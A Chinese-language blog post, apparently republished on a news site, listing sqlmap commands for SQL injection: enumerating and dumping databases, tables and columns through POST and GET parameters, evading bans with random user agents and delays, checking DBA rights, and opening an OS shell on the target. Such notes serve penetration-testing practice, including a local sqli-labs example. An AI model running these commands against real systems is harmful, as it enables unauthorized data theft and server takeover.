您当前的位置: 首页 资讯 >

资讯:sqlmap的一些简单使用命令

2023-05-19 20:38:05 来源:博客园

路径


(相关资料图)

C:\Users\Administrator\AppData\Local\Programs\Python\Python39\sqlmap

post型注入

*每次使用都要重新抓包,不可以使用旧的数据包

sqlmap -r 目标文件

直接把post.txt拖进去

回车(~ ̄▽ ̄)~

得到数据库名和版本

使用 sqlmap.py -r 目标文件 --current-db 爆当前数据库

*使用 sqlmap.py -r 目标文件 --dbs 可得到所有目标ip下的所有数据库

爆数据库下的表名

sqlmap.py -r 目标文件 -D 数据库名 --tables

爆数据库下的指定表名下的所有列名

sqlmap.py -r 目标文件 -D 数据库名 -T 指定表名 --columns

爆数据库下的指定表名下的指定列名下的所有数据

sqlmap.py -r 目标文件 -D 数据库名 -T 指定表名 -C指定列名 --dump

查询那张表有username与password

get型注入

判断是否可以注入及注入类型

python sqlmap.py -u 目标网址/?id=1

查询数据库

python sqlmap.py -u 目标网址/?id=1 --dbs 所有数据库

python sqlmap.py -u 目标网址/?id=1 --current-db 当前数据库

查询数据库下的全部表

python sqlmap.py -u 目标网址/?id=1 -D 数据库名字 --tables

查询指定表下的全部列

python sqlmap.py -u 目标网址/?id=1 -D 数据库名字 -T 指定表名 --columns

查询指定列下的数据

python sqlmap.py -u 目标网址/?id=1 -D 数据库名字 -T 指定表名 -C 列名 --dump

一些使用sqlmap的命令

--random-agent 随机代理 头部

--delay=1 每次探测延时1s 防止访问过快被ban

--count 查看数据的数量 --dump 获取所有数据 脱库

-u http://127.0.0.1/sqliLabs/less-8/-D security --count

--level 1-5 测试等级1-5 等级越高,检测越详细 等级大于2会检测cookie注入 大于3会检测头注入

--risk sqlmap测试语句的复杂度

--level3 --risk2

--is-dba 查询用户当前权限 dba:true 得到最高权限

--os-shell 直接获得目标的cmd权限

有cmd肯定有dba 有dba不一定有cmd

--fulsh-session 刷新缓存

标签:
x 广告
x 广告

Copyright ©  2015-2023 非洲科学网版权所有  备案号:沪ICP备2022005074号-8   联系邮箱:58 55 97 3@qq.com